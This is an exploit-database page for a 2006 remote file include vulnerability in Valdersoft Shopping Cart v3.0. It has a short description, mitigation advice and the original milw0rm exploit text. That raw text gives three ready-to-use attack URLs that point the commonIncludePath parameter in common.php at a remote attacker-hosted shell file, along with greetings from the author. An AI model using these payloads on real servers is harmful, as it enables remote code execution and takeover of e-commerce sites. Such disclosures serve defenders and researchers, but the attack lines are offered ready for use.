header-logo
Suggest Exploit
vendor:
Shopping Cart
by:
mdx
8,8
CVSS
HIGH
Remote File Include
98
CWE
Product Name: Shopping Cart
Affected Version From: 3.0
Affected Version To: 3.0
Patch Exists: NO
Related CWE: N/A
CPE: a:valdersoft:shopping_cart:3.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Valdersoft Shopping Cart v3.0 (E-Commerce Software) [commonIncludePath] Remote File Include

Valdersoft Shopping Cart v3.0 (E-Commerce Software) is vulnerable to a remote file include vulnerability due to the use of an unsecured parameter, commonIncludePath, in the common.php file. An attacker can exploit this vulnerability by sending a malicious URL in the commonIncludePath parameter. This will allow the attacker to include a remote file containing malicious code on the vulnerable server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that the commonIncludePath parameter is properly sanitized and validated before being used in the common.php file.
Source

Exploit-DB raw data:

******************************************************************************************************
*Valdersoft Shopping Cart v3.0 (E-Commerce Software)*****[ commonIncludePath ] Remote File Include*
******************************************************************************************************
*******************************************
+class : Remote File Include Vulnerability*
*******************************************
+Author : mdx                             *
*****************************************************************************
+Files :
*
+/common_include/common.php , /include/common.php, /admin/include/common.php*
*
*
*****************************************************************************
+code  :                                                                    *
+                                                                           *
+    include ( $commonIncludePath."common.php" );                           *
+                                                                           *
*********************************************************************************************
+ Exploit  :                                                                                *
+********************************************************************************************+
+ http://www.site.***/[path]/admin/include/common.php?commonIncludePath=http://mdxshell.txt?*+
+********************************************************************************************+
+ http://www.site.***/[path]/include/common.php?commonIncludePath=http://mdxshell.txt?*******+
+********************************************************************************************+
+ http://www.site.***/[path]/common_include/common.php?commonIncludePath=http://mdxshell.txt?+
+********************************************************************************************+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
==============================================================================================
?                                                                                            *
?                                                                                            *
? Thanks ; Cyber-WARRIOR TIM USERS, xoron , prohack ,leak , ozii , sakkure , abbad, dreamlord*
?                                                                                            *
?/////////////////////////////////////////////////////////////////////////////////////////////
?---------------------specials thanks  stroke ,SHiKaA----------------------------------------*
**********************************************************************************************
*******************                                                                          *
*******************                   KORKULARINIZ SADECE KABUSLARINIZDIR..		     *
*******************                                                                          *
*******************                        Turkish Hacker by mdx                             *
*******************                                                                          *
*******************                        Korkmak Kurtulmak Degildir.			     *
*******************                                                                          *
**********************************************************************************************

# milw0rm.com [2006-12-20]

Navigation

Suggest Exploit

Services By CQR